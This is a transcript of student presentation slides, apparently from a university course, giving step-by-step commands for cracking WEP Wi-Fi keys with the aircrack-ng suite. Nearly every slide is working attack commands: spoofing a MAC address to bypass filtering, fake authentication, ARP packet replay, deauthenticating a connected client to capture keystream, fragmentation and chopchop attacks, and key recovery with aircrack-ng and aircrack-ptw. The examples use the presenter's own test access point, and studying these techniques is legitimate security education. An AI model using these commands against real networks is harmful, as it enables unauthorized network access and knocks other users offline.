Cracking WiFi Networks Addendum: Example Commands - PowerPoint PPT Presentation

1 / 8
About This Presentation
Title:

Cracking WiFi Networks Addendum: Example Commands

Description:

The following addendum s are active examples of the WEP cracking process ... for picky access points, you may have to run a command such as: ... – PowerPoint PPT presentation

Number of Views:92
Avg rating:3.0/5.0
Slides: 9
Provided by: peterma62
Category:

less

Transcript and Presenter's Notes

Title: Cracking WiFi Networks Addendum: Example Commands


1
Cracking Wi-Fi Networks Addendum Example
Commands
  • Peter MacLellan
  • Northeastern University
  • Candidate BSCS 2008

2
Addendum Examples
  • The following addendum slides are active examples
    of the WEP cracking process using aircrack-ptw
    and aircrack-ng
  • For all examples
  • AP SSID WEP Testing
  • AP channel 6
  • AP MAC 001346472252
  • My MAC 000FB5CAB774
  • Interface wlan0

3
Patch Drivers
  • Installing patched drivers for WG111v2
  • Install patched drivers as described at
    http//www.aircrack-ng.org/doku.php?idr8187DokuW
    iki735177530b674cc6ca5632ac62f4dbbd
  • Make drivers from http//rtl-wifi.sourceforge.net/
    wiki/InstallingRemoving_mainline_ieee80211_Stack
  • Run the following commands in the rtl-wifi
    folder
  • sudo insmod ieee80211/ieee80211_crypt-rtl.ko
  • sudo insmod ieee80211/ieee80211_crypt_wep-rtl.ko
  • sudo insmod ieee80211/ieee80211_crypt_tkip-rtl.ko
  • sudo insmod ieee80211/ieee80211_crypt_ccmp-rtl.ko
  • sudo insmod ieee80211/ieee80211-rtl.ko
  • sudo insmod rtl8187-newstack/r8187.ko

4
Testing for ARP Injection
  • In order to do active attacks, you must check
    that ARP injection is working
  • The easiest command to run to check this is
  • sudo aireplay-ng -9 wlan0

5
Addendum 3 MAC Spoofing if MAC filtering
  • If the AP has MAC filtering, find out a client
    MAC address and spoof it with
  • ifconfig wlan0 down
  • ifconfig wlan0 hw ether ltnew MAC addrgt
  • ifconfig wlan0 up

6
Commands for simple WEP crack with injection
  • commands for WEP cracking
  • put wireless card into monitor mode
  • airmon-ng start wlan0 channel
  • start airodump to look out for networks
  • sudo airodump-ng wlan0
  • select one network to crack
  • sudo airodump-ng -c 11 --bssid 001346472252
    -w dump wlan0
  • Do fake association with AP
  • sudo aireplay-ng -1 0 -e 'WEP Testing' -a
    001346472252 -h 000FB5CAB774 wlan0
  • In NEW CONSOLE SESSION, reinject ARP packets
  • sudo aireplay-ng -3 -b ltAP MACCgt -h ltMy MACgt
    wlan0
  • ex sudo aireplay-ng -3 -b 001346472252 -h
    000FB5CAB774 wlan0
  • IN NEW CONSOLE SESSION, try to crack the key
  • sudo aircrack-ng -b 001346472252 dump-01.cap
  • ...or to use aircrack-ptw
  • sudo aircrack-ptw dump-01.cap

7
Shared Fake Key Auth
  • shared key fake authentication
  • put the wirless card into monitor mode on the
    channel we want to crack
  • sudo airmon-ng start wlan0 channel
  • Create pseudo random generation algorithm xor
    file (PRGA xor file)
  • airodump-ng -c 9 --bssid 001346472252 -w
    sharedkey wlan0
  • Wait until "PSK" appears in auth column (this
    may take some waiting)
  • When that apears, a file will be created named
    sharedkey-MACADDRESS.xor
  • --this is the PRGA xor file
  • If you're not patient and don't feel like
    waiting, deauthenticate a client as follows
  • - Determine a client that's currently connected
  • - send the following command (have previous
    command running in another window)
  • sudo aireplay-ng -0 1 -a ltMAC Addr APgt -c ltMAC
    Addr clientgt wlan0
  • Now you're ready to perform Shared Key Fake
    Authentication
  • sudo aireplay-ng -1 0 -e ltSSIDgt -y ltPRGA xor
    filegt -a ltMAC Addr APgt -h ltMy MAC Addrgt wlan0
  • Now, continue with the above attack (standard
    injection techniques)

8
Clientless WEP Crack
  • There are 7 steps to cracking clientless WEP (
  • 1. Start the wireless interface in monitor mode
    on AP channel
  • sudo airmon-ng start wlan0 channel
  • sudo airmon-ng start wlan0 6
  • 2. Use aireplay-ng to do a fake authentication
    with the access point
  • sudo aireplay-ng -1 0 -e ltSSIDgt -a ltMAC Addr
    APgt -h ltMy MAC Addrgt wlan0
  • ex) sudo aireplay-ng -1 0 -e 'WEP Testing' -a
    001346472252 -h 00-0F-B5-CA-B7-74 wlan0
  • for picky access points, you may have to run a
    command such as
  • sudo aireplay-ng -1 6000 -o 1 -q 10 -e ltSSIDgt
    -a ltMAC Addr APgt -h ltMy MAC Addrgt wlan0
  • -1 6000 - Reauthenticate every 6000 seconds.
  • -o 1 - Send only one set of packets at a
    time
  • -q 10 - Send keepalive packets every 10
    seconds
  • ex) sudo aireplay-ng -1 0 -e 'WEP Testing' -a
    001346472252 -h 000FB5CAB774 wlan0
  • 3. Use aireplay-ng chopchop or fragmentation
    attack to obtain PRGA (pseudo random generation
    algorithm)
  • - The PRGA is used to create new packets for
    injection
  • - first, try fragmentation technique
  • aireplay-ng -5 -b 001346472252 -h
    000FB5CAB774 wlan0
  • - if fragmentation failed, try chopchop
    technique
  • aireplay-ng -4 -h 000FB5CAB774 -b
    001346472252 wlan0
Write a Comment
User Comments (0)
About PowerShow.com